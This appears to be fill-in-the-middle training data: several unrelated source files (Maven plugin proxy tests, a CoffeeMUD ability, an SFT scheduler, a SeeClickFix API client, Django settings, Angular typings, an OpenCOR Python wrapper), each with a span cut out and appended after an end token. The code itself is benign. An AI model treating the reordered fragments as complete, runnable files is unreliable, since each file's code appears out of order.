1, 'Expected "maven-options" "minitems" to be 1, but ' 'it was "{}"'.format(maven_options['minitems'])) self.assertTrue( 'uniqueItems' in maven_options, 'Expected "uniqueItems" to be included in "maven-options"') self.assertTrue( maven_options['uniqueItems'], 'Expected "maven-options" "uniqueItems" to be "True"') maven_targets = properties['maven-targets'] self.assertTrue( 'type' in maven_targets, 'Expected "type" to be included in "maven-targets"') self.assertEqual(maven_targets['type'], 'array', 'Expected "maven-targets" "type" to be "array", but ' 'it was "{}"'.format(maven_targets['type'])) 
self.assertTrue( 'minitems' in maven_targets, 'Expected "minitems" to be included in "maven-targets"') self.assertEqual(maven_targets['minitems'], 1, 'Expected "maven-targets" "minitems" to be 1, but ' 'it was "{}"'.format(maven_targets['minitems'])) self.assertTrue( 'uniqueItems' in maven_targets, 'Expected "uniqueItems" to be included in "maven-targets"') self.assertTrue( maven_targets['uniqueItems'], 'Expected "maven-targets" "uniqueItems" to be "True"') @mock.patch.object(maven.MavenPlugin, 'run') def test_build(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_fail(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) os.makedirs(plugin.sourcedir) self.assertRaises(RuntimeError, plugin.build) run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_war(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.war'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_targets(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) opts = self.options opts.maven_targets = ['child1', 'child2'] plugin = maven.MavenPlugin('test-part', opts, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'child1', 'target')) os.makedirs(os.path.join(plugin.builddir, 'child2', 'target')) open(os.path.join(plugin.builddir, 'child1', 'target', 'child1.jar'), 'w').close() open(os.path.join(plugin.builddir, 'child2', 'target', 'child2.jar'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( 
os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy_and_no_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', 'internal'), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>internal</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy_and_no_proxies(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', 'internal, pseudo-dmz'), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' 
<protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>internal|pseudo-dmz</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_and_https_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', 'http://localhost:3133'), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'<|fim▁hole|> ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' <proxy>\n' ' <id>https_proxy</id>\n' ' <active>true</active>\n' ' <protocol>https</protocol>\n' ' <host>localhost</host>\n' ' <port>3133</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_authenticated_proxies(self, run_mock): env_vars = ( ('http_proxy', 'http://user1:pass1@localhost:3132'), ('https_proxy', 'http://user2:pass2@localhost:3133'), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <username>user1</username>\n' ' <password>pass1</password>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' <proxy>\n' ' <id>https_proxy</id>\n' ' <active>true</active>\n' ' <protocol>https</protocol>\n' ' <host>localhost</host>\n' ' <port>3133</port>\n' ' <username>user2</username>\n' ' 
<password>pass2</password>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents)<|fim▁end|>
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
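The expected settings.xml in the maven plugin tests above is derived from proxy URLs such as http://user1:pass1@localhost:3132. Python's standard urlparse splits such URLs into the same host/port/credential fields (a sketch independent of snapcraft):

from urllib.parse import urlparse

proxy = urlparse('http://user1:pass1@localhost:3132')

# These map onto <host>, <port>, <username> and <password> in settings.xml.
print(proxy.hostname)  # localhost
print(proxy.port)      # 3132
print(proxy.username)  # user1
print(proxy.password)  # pass1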
<|file_name|>Play_Organs.java<|end_file_name|><|fim▁begin|>package com.planet_ink.coffee_mud.Abilities.Songs; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2000-2014 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ public class Play_Organs extends Play_Instrument { @Override public String ID() { return "Play_Organs"; } private final static String localizedName = CMLib.lang()._("Organs"); @Override public String name() { return localizedName; } @Override protected int requiredInstrumentType(){return MusicalInstrument.TYPE_ORGANS;} @Override public String mimicSpell(){return "Prayer_ProtectHealth";} @Override protected int canAffectCode(){return 0;}<|fim▁hole|> protected Ability getSpell() { if(theSpell!=null) return theSpell; if(mimicSpell().length()==0) return null; theSpell=CMClass.getAbility(mimicSpell()); return theSpell; } }<|fim▁end|>
private static Ability theSpell=null; @Override
<|file_name|>sft_handler.py<|end_file_name|><|fim▁begin|>""" Dealing with SFT tests. """ import logging import sft_meta import sft_schema as schema from sft.utils.helpers import strip_args class SFTPool(): """ This class defines all site functional tests (SFT)s that shall be executed. """ def __init__(self): self.log = logging.getLogger(__name__) self.session=sft_meta.Session() self.log.debug("Initialization finished") def __del__(self): self.session.close() @strip_args def add_sft(self, name, cluster_grp, vo_grp,test_suit): """ Adding a new SFT to the 'global' pool of SFTS. params: name - the name of the SFT, must be unique cluster_grp - the name of the cluster group (see ClusterGroupPool) to which SFTs shall apply vo_grp - the name of the VO group (see VOGroupPool), to which SFT shall apply test_suit - the suit of tests the SFT consists of Notice: the execution time, is must be set via the set_exectime method Notice: XXX checks whether cluster_grp, vo_grp and test_suit exist are currently missing """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: self.log.info("SFT test '%s' exists already, overwriting" % name) else: self.log.debug("Adding SFT '%s'." % name) sft = schema.SFTTest() sft.name = name sft.cluster_group = cluster_grp sft.vo_group = vo_grp sft.test_suit = test_suit self.session.add(sft) self.session.commit() @strip_args<|fim▁hole|> def set_exectime(self, name, minute='0', hour='*', day='*', month='*', weekday='*'): """ Setting execution time of the SFT. params: name - name of the SFT minute - minute 0-59, default 0 hour - hour 0-23, default * day - day 1-31, default * month - month 1-12, default * weekday - day of week 0-6, Sunday=0, default * Notice: for each param, you can use crontab notation, e.g. '*', '1-3', '*/5', etc. """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: sft.minute = minute sft.hour = hour sft.day = day sft.month= month sft.weekday = weekday self.session.commit() @strip_args def remove_sft(self, name): """ removing SFT from SFT pool. params: name - name of SFT to remove """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: self.log.info("Removing sft '%s'." % name) self.session.delete(sft) self.session.commit() def list_sfts(self): """ Listing of all existing SFTs in pool. returns list of SFT objects """ return self.session.query(schema.SFTTest).all()<|fim▁end|>
<|file_name|>seeclickfix_api.py<|end_file_name|><|fim▁begin|>''' Pull one page of 100 results from seeclickfix using the global PARAMS value if the parameters are not supplied. If there are more than 100 results, make another pull passing paramters that include the next page to be pulled. Nicole Donnelly 30May2016, updated 21Oct2016 ''' import requests import json def get_seeclickfix(page=1, pulled=0, search_params={'place_url': 'district-of-columbia', 'after': '2016-10-01', 'per_page': 100}): # base_url for usajobs api to build the request url base_url = 'https://seeclickfix.com/api/v2/issues' # send a get request with the url, parameters, and header myResponse = requests.get(url=base_url, params=search_params) # For successful API call, response code will be 200 (OK) if(myResponse.ok): # Loading the response data into a dict variable data = json.loads(myResponse.content.decode('utf-8')) # get the total search result count and set it to count_all. the # API only allows 100 results per page count_all = data['metadata']['pagination']['entries'] <|fim▁hole|> pulled = pulled + 100 # create a file name that reflects which page of results it contains # and write that file file_name = 'data%d.json' % page with open(file_name, 'w') as outfile: json.dump(data, outfile) # check to see if we pulled all the results. If not, increment the # page count, update the parameters dictionary to include the page # number, and run the process again. if pulled < count_all: page += 1 page_param = {'page': page} search_params.update(page_param) print(search_params) get_seeclickfix(page, pulled, search_params) else: # If response code is not ok (200), print the resulting http error # code with description myResponse.raise_for_status() if __name__ == '__main__': get_seeclickfix()<|fim▁end|>
# track the number of items we have pulled with our requests
<|file_name|>epio.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import from .base import * from bundle_config import config DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': config['postgres']['database'], 'USER': config['postgres']['username'], 'PASSWORD': config['postgres']['password'], 'HOST': config['postgres']['host'], } } <|fim▁hole|> host=config['redis']['host'], port=config['redis']['port']), 'OPTIONS': { 'PASSWORD': config['redis']['password'], }, 'VERSION': config['core']['version'], }, } DEBUG = False<|fim▁end|>
CACHES = { 'default': { 'BACKEND': 'redis_cache.RedisCache', 'LOCATION': '{host}:{port}'.format(
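The epio.py row maps a platform-provided config mapping into Django settings dicts. The same shape, sketched with a plain dictionary standing in for bundle_config (the host and password values below are invented):

# Stand-in for ep.io's bundle_config; real values come from the platform.
config = {'redis': {'host': 'cache.internal', 'port': 6379, 'password': 's3cret'},
          'core': {'version': '1'}}

CACHES = {
    'default': {
        'BACKEND': 'redis_cache.RedisCache',
        'LOCATION': '{host}:{port}'.format(host=config['redis']['host'],
                                           port=config['redis']['port']),
        'OPTIONS': {'PASSWORD': config['redis']['password']},
        'VERSION': config['core']['version'],
    },
}

print(CACHES['default']['LOCATION'])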
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>from m2core.m2core import M2Core, logger from m2core import bases from m2core import data_schemes from m2core import db<|fim▁hole|>from m2core import utils from m2core import common<|fim▁end|>
<|file_name|>private_import_core.d.ts<|end_file_name|><|fim▁begin|>/** * @license * Copyright Google Inc. All Rights Reserved. * * Use of this source code is governed by an MIT-style license that can be<|fim▁hole|>export declare type RenderDebugInfo = typeof r._RenderDebugInfo; export declare var RenderDebugInfo: typeof r.RenderDebugInfo; export declare type DirectRenderer = typeof r._DirectRenderer; export declare var ReflectionCapabilities: typeof r.ReflectionCapabilities; export declare type DebugDomRootRenderer = typeof r._DebugDomRootRenderer; export declare var DebugDomRootRenderer: typeof r.DebugDomRootRenderer; export declare var reflector: typeof r.reflector; export declare type NoOpAnimationPlayer = typeof r._NoOpAnimationPlayer; export declare var NoOpAnimationPlayer: typeof r.NoOpAnimationPlayer; export declare type AnimationPlayer = typeof r._AnimationPlayer; export declare var AnimationPlayer: typeof r.AnimationPlayer; export declare type AnimationSequencePlayer = typeof r._AnimationSequencePlayer; export declare var AnimationSequencePlayer: typeof r.AnimationSequencePlayer; export declare type AnimationGroupPlayer = typeof r._AnimationGroupPlayer; export declare var AnimationGroupPlayer: typeof r.AnimationGroupPlayer; export declare type AnimationKeyframe = typeof r._AnimationKeyframe; export declare var AnimationKeyframe: typeof r.AnimationKeyframe; export declare type AnimationStyles = typeof r._AnimationStyles; export declare var AnimationStyles: typeof r.AnimationStyles; export declare var prepareFinalAnimationStyles: typeof r.prepareFinalAnimationStyles; export declare var balanceAnimationKeyframes: typeof r.balanceAnimationKeyframes; export declare var clearStyles: typeof r.clearStyles; export declare var collectAndResolveStyles: typeof r.collectAndResolveStyles;<|fim▁end|>
* found in the LICENSE file at https://angular.io/license */ import { __core_private__ as r } from '@angular/core';
<|file_name|>start_basinhopping_worker.py<|end_file_name|><|fim▁begin|>from pele.concurrent import BasinhoppingWorker from start_server import create_system, get_server_uri def main(): system = create_system() uri = get_server_uri() worker = BasinhoppingWorker(uri, system=system) worker.run(1000) <|fim▁hole|><|fim▁end|>
if __name__ == "__main__": main()
<|file_name|>datastorepythonwrapper.cpp<|end_file_name|><|fim▁begin|>/******************************************************************************* Copyright (C) The University of Auckland OpenCOR is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. OpenCOR is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://gnu.org/licenses>. *******************************************************************************/ //============================================================================== // Data store Python wrapper //============================================================================== #include <Qt> //============================================================================== // Note: yes, these two header files must be included in this order... #include "datastorepythonwrapper.h" #include "datastorepythonnumpy.h" //============================================================================== #include "pythonqtsupport.h" //============================================================================== #include <array> //============================================================================== namespace OpenCOR { namespace DataStore { //============================================================================== static bool initNumPy() { // Initialise NumPy import_array1(false) return true; } //============================================================================== static DataStoreValue * getDataStoreValue(PyObject *pValuesDict, PyObject *pKey) { // Get and return a DataStoreValue item from a values dictionary PythonQtInstanceWrapper *wrappedObject = PythonQtSupport::getInstanceWrapper(PyDict_GetItem(pValuesDict, pKey)); if (wrappedObject != nullptr) { return static_cast<DataStoreValue *>(wrappedObject->_objPointerCopy); } return nullptr; } //============================================================================== static PyObject * DataStoreValuesDict_subscript(PyObject *pValuesDict, PyObject *pKey) { // Get and return a subscripted item from a values dictionary DataStoreValue *dataStoreValue = getDataStoreValue(pValuesDict, pKey); if (dataStoreValue != nullptr) { return PyFloat_FromDouble(dataStoreValue->value()); } #include "pythonbegin.h" Py_RETURN_NONE; #include "pythonend.h" } //============================================================================== using DataStoreValuesDictObject = struct { PyDictObject dict; SimulationSupport::SimulationDataUpdatedFunction *simulationDataUpdatedFunction; }; //============================================================================== static int DataStoreValuesDict_ass_subscript(PyObject *pValuesDict, PyObject *pKey, PyObject *pValue) { // Assign to a subscripted item in a values dictionary if (pValue == nullptr) { return PyDict_DelItem(pValuesDict, pKey); } if (PyNumber_Check(pValue) == 1) { DataStoreValue *dataStoreValue = getDataStoreValue(pValuesDict, pKey); if (dataStoreValue != nullptr) { #include "pythonbegin.h" auto newValue = PyFloat_AS_DOUBLE(PyNumber_Float(pValue)); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) #include "pythonend.h" if 
(!qFuzzyCompare(dataStoreValue->value(), newValue)) { dataStoreValue->setValue(newValue); // Let our SimulationData object know that simulation data values // have been updated<|fim▁hole|> if (simulationDataUpdatedFunction != nullptr) { (*simulationDataUpdatedFunction)(); } } return 0; } } PyErr_SetString(PyExc_TypeError, qPrintable(QObject::tr("invalid value."))); return -1; } //============================================================================== static PyMappingMethods DataStoreValuesDict_as_mapping = { nullptr, // mp_length static_cast<binaryfunc>(DataStoreValuesDict_subscript), // mp_subscript static_cast<objobjargproc>(DataStoreValuesDict_ass_subscript) // mp_ass_subscript }; //============================================================================== #include "pythonbegin.h" static PyObject * DataStoreValuesDict_repr(DataStoreValuesDictObject *pValuesDict) { // A string representation of a values dictionary // Note: this is a modified version of dict_repr() from dictobject.c in the // Python source code... auto mp = reinterpret_cast<PyDictObject *>(pValuesDict); Py_ssize_t i = Py_ReprEnter(reinterpret_cast<PyObject *>(mp)); PyObject *key = nullptr; PyObject *value = nullptr; bool first = true; if (i != 0) { return (i > 0)? PyUnicode_FromString("{...}"): nullptr; } if (mp->ma_used == 0) { Py_ReprLeave(reinterpret_cast<PyObject *>(mp)); return PyUnicode_FromString("{}"); } _PyUnicodeWriter writer; _PyUnicodeWriter_Init(&writer); writer.overallocate = 1; writer.min_length = 1+4+(2+4)*(mp->ma_used-1)+1; if (_PyUnicodeWriter_WriteChar(&writer, '{') < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } while (PyDict_Next(reinterpret_cast<PyObject *>(mp), &i, &key, &value) != 0) { PyObject *s; int res; Py_INCREF(key); Py_INCREF(value); if (!first) { if (_PyUnicodeWriter_WriteASCIIString(&writer, ", ", 2) < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } } first = false; s = PyObject_Repr(key); if (s == nullptr) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } res = _PyUnicodeWriter_WriteStr(&writer, s); Py_DECREF(s); if (res < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } if (_PyUnicodeWriter_WriteASCIIString(&writer, ": ", 2) < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } PythonQtInstanceWrapper *wrappedValue = PythonQtSupport::getInstanceWrapper(value); if (wrappedValue != nullptr) { auto dataStoreValue = static_cast<DataStoreValue *>(wrappedValue->_objPointerCopy); Py_CLEAR(value); value = PyFloat_FromDouble(dataStoreValue->value()); } s = PyObject_Repr(value); if (s == nullptr) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } res = _PyUnicodeWriter_WriteStr(&writer, s); Py_DECREF(s); if (res < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } Py_CLEAR(key); Py_CLEAR(value); } writer.overallocate = 0; if (_PyUnicodeWriter_WriteChar(&writer, '}') < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } Py_ReprLeave((PyObject *)mp); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast, google-readability-casting) return _PyUnicodeWriter_Finish(&writer); error: Py_ReprLeave((PyObject *)mp); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast, google-readability-casting) _PyUnicodeWriter_Dealloc(&writer); Py_XDECREF(key); Py_XDECREF(value); return nullptr; } #include "pythonend.h" //============================================================================== // Note: a 
DataStoreValuesDict is a dictionary sub-class for mapping between the // values of a DataStoreValues list and Python... static PyTypeObject DataStoreValuesDict_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "OpenCOR.DataStoreValuesDict", // tp_name sizeof(DataStoreValuesDictObject), // tp_basicsize 0, // tp_itemsize nullptr, // tp_dealloc nullptr, // tp_print nullptr, // tp_getattr nullptr, // tp_setattr nullptr, // tp_compare reinterpret_cast<reprfunc>(DataStoreValuesDict_repr), // tp_repr nullptr, // tp_as_number nullptr, // tp_as_sequence &DataStoreValuesDict_as_mapping, // tp_as_mapping nullptr, // tp_hash nullptr, // tp_call nullptr, // tp_str nullptr, // tp_getattro nullptr, // tp_setattro nullptr, // tp_as_buffer Py_TPFLAGS_DEFAULT|Py_TPFLAGS_BASETYPE, // tp_flags nullptr, // tp_doc nullptr, // tp_traverse nullptr, // tp_clear nullptr, // tp_richcompare 0, // tp_weaklistoffset nullptr, // tp_iter nullptr, // tp_iternext nullptr, // tp_methods nullptr, // tp_members nullptr, // tp_getset &PyDict_Type, // tp_base nullptr, // tp_dict nullptr, // tp_descr_get nullptr, // tp_descr_set 0, // tp_dictoffset nullptr, // tp_init nullptr, // tp_alloc nullptr, // tp_new nullptr, // tp_free nullptr, // tp_is_gc nullptr, // tp_bases nullptr, // tp_mro nullptr, // tp_cache nullptr, // tp_subclasses nullptr, // tp_weaklist nullptr, // tp_del 0, // tp_version_tag nullptr, // tp_finalize }; //============================================================================== DataStorePythonWrapper::DataStorePythonWrapper(void *pModule, QObject *pParent) : QObject(pParent) { Q_UNUSED(pModule) // Initialise NumPy if (OpenCOR_Python_Wrapper_PyArray_API == nullptr) { #ifdef QT_DEBUG bool res = #endif initNumPy(); #ifdef QT_DEBUG if (!res) { qFatal("FATAL ERROR | %s:%d: unable to initialise NumPy.", __FILE__, __LINE__); } #endif } PyType_Ready(&DataStoreValuesDict_Type); // Register some OpenCOR classes with Python and add some decorators to // ourselves PythonQtSupport::registerClass(&DataStore::staticMetaObject); PythonQtSupport::registerClass(&DataStoreValue::staticMetaObject); PythonQtSupport::registerClass(&DataStoreVariable::staticMetaObject); PythonQtSupport::addInstanceDecorators(this); } //============================================================================== PyObject * DataStorePythonWrapper::dataStoreValuesDict(const DataStoreValues *pDataStoreValues, SimulationSupport::SimulationDataUpdatedFunction *pSimulationDataUpdatedFunction) { // Create and return a Python dictionary for the given data store values and // keep track of the given simulation data updated function so that we can // let OpenCOR know when simulation data have been updated PyObject *res = PyDict_Type.tp_new(&DataStoreValuesDict_Type, nullptr, nullptr); res->ob_type = &DataStoreValuesDict_Type; reinterpret_cast<DataStoreValuesDictObject *>(res)->simulationDataUpdatedFunction = pSimulationDataUpdatedFunction; if (pDataStoreValues != nullptr) { for (int i = 0, iMax = pDataStoreValues->size(); i < iMax; ++i) { DataStoreValue *value = pDataStoreValues->at(i); PythonQtSupport::addObject(res, value->uri(), value); } } return res; } //============================================================================== PyObject * DataStorePythonWrapper::dataStoreVariablesDict(const DataStoreVariables &pDataStoreVariables) { // Create and return a Python dictionary for the given data store variables PyObject *res = PyDict_New(); for (auto dataStoreVariable : pDataStoreVariables) { PythonQtSupport::addObject(res, dataStoreVariable->uri(), 
